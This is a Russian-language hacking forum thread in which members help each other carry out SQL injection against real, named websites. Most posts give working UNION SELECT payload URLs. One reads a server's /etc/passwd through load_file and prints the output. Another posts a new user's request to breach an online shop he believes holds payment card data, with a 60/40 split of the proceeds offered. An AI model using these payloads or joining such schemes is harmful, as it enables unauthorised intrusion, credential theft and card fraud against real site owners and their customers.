Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.trommeslageren.dk/index2.php?id=0'+and+0+union+select+1,2,3,4,5,6,7--+
     
    _________________________
  2. kroŧ

    kroŧ Member

    Joined:
    19 May 2010
    Messages:
    129
    Likes Received:
    33
    Reputations:
    8
    если я пишу
    +UnIoN+AlL+sElEcT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1--
    выдаст 1 строку

    возможно ли чтобы выдало все таблицы сразу ни по 1 строке?
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    group_concat() для mysql

    тока на все таблицы, а в пределах 1024 символов


    krot читайте мануалы, там вы найдете все ответы на вашы вопросы

    ---------
    на этом сайте форум ипб, смотрите в сторону форума
     
    _________________________
    2 people like this.
  4. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Можно и без огранечения в 1024 через IF или benchmark: https://forum.antichat.ru/showpost.php?p=2298777&postcount=16
     
    #17004 randman, 10 Jun 2011
    Last edited: 10 Jun 2011
    1 person likes this.
  5. KosoyRoman

    KosoyRoman Banned

    Joined:
    14 Sep 2008
    Messages:
    51
    Likes Received:
    12
    Reputations:
    -5
    3 станларт
     
  6. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите определить БД, похоже на Postgres, но вывода не могу добиться


    http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+and+1=0+union+select+version()+--+
     
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Может туплю, конечно, но в упор не вижу тут никакой инъекции...
     
  8. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764*1
    http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764*4

    http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+union+select+1+--+
    http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+union+select+1,2+--+
     
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Туплю, туплю. Инъекция всё же есть. Но т.к. параметр page - то она, скорее всего, в операторе типа LIMIT, и через union её не получится раскрутить.
     
  10. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Code:
    http://www.avtogalaktika.ru/i.cgi?page=0+union+select+concat_ws(0x3a,version(),user(),database())+--+
    4.1.20:root@localhost:Site2

    Code:
    http://www.avtogalaktika.ru/i.cgi?page=0+union+select+load_file('/etc/passwd')+--+
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin
     
    #17010 M_script, 11 Jun 2011
    Last edited: 11 Jun 2011
  11. 3aHyga

    3aHyga New Member

    Joined:
    8 Jun 2011
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    Здравствуйте. Я не так давно решил заняться sql injectionom, так вот у меня созрели два вопроса. Я провел sql inject узнал, узнал названние таблиц, и нужной мне ячейки, делаю такой запрос
    Code:
    www.сайт.com/index.php?id=-15+union+select+1,2,3,concat_ws(login,0x3a,password),5,6+from+user+--+
    Но логин и пароль на странице не поивился, и не выдала не какой ошибки, страница просто появилось. Version: 5.1.35.
    Тоже самое я пробывал с другими таблицами, все было аналогично
    Второй вопрос
    Дайте пожалуйста сылку на faq! Как провести sql injection в mysql v4.***** я на форуме не увидел не одной нормальной статьи для версии 4.***** я конечно уверен что они тут есть но найти не как не могу. Зараннее огромное спасибо.
     
  12. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    1) Не "concat_ws(login,0x3a,password)", а "concat_ws(0x3a,login,password)" или "concat(login,0x3a,password)"
    Попробуй limit добавить.

    2) SQL injection полный FAQ
     
  13. 3aHyga

    3aHyga New Member

    Joined:
    8 Jun 2011
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    я вертел по всякому и с +limit+0,1 по разному пробывал! Но данные ячеек не появлялись! Может другие варианты есть?
    Code:
    [url=https://forum.antichat.ru/thread43966.html]SQL injection полный FAQ[/url]
    этот фак я читал, и как я понил он ближе к 5-тым версиям mysql
     
    #17013 3aHyga, 11 Jun 2011
    Last edited: 11 Jun 2011
  14. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    может база не та
    или unhex(hex())
     
    #17014 Seravin, 11 Jun 2011
    Last edited: 11 Jun 2011
  15. 3aHyga

    3aHyga New Member

    Joined:
    8 Jun 2011
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    Можно по подробней? Точней пример запроса к бд
     
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Так вывод еще лучше:

     
  17. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    3aHyga, кинь ссылку сюда или в личку
     
  18. 3aHyga

    3aHyga New Member

    Joined:
    8 Jun 2011
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    Тут есть загвоздка! Я все делал на дедики и дедик в это время вырубился, я не знаю что там было может свет моргнул, или еще что данные сылки я утерял так как логи не сохранялись в мазиле а вспомнить не могу, а вобще это был какойто интернет магазин но не могу вспомнить сылку :(
    вот могу еще один шоп дать там есть вывод на страницу и тд но не чего интересного там нету
    _http://e-perfume.com.ar/verproducto.php?id=-180'
     
  19. 3aHyga

    3aHyga New Member

    Joined:
    8 Jun 2011
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    Только что нашол интернет магазин! в катором я на 100% уверен хроняться даные о картах, так как покупка проходит имено через этот магазин все данные вбиваются в него, на другие сайты не кидает, но там есть какойто прикол! Допустим я делаю запрос
    Code:
    www.сайт.com/index.php?id=15+union+select+1,@@version,3,4,5,6+--+
    то сайт показывает информацыю о версии sql // - 5.0.51a-3ubuntu5
    если же я делаю любой другой запрос меня перегидывает на главную страницу. Так как я еще совсем новечек и не знаю всех прелестей sql injecta кто согласится мне помоч или сам проведет sql inject конечно все 50 на 50 я согласен даже что вам 60% а мне 40 так как всю работу будите делать вы то отпишите в асю я дам данные сайта
    icq 144-558-923
     
  20. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Либо ты делаешь неправильный запрос, либо наверняка обращаешься к information_schema и её таблицам, а на них может стоить фильтр. Попробуй выяснить в каком случае тебя перекидывает.

    ps. а вообще что-то более конкретное советовать можно только увидев сайт.
     
    #17020 Melfis, 11 Jun 2011
    Last edited: 11 Jun 2011
Thread Status:
Not open for further replies.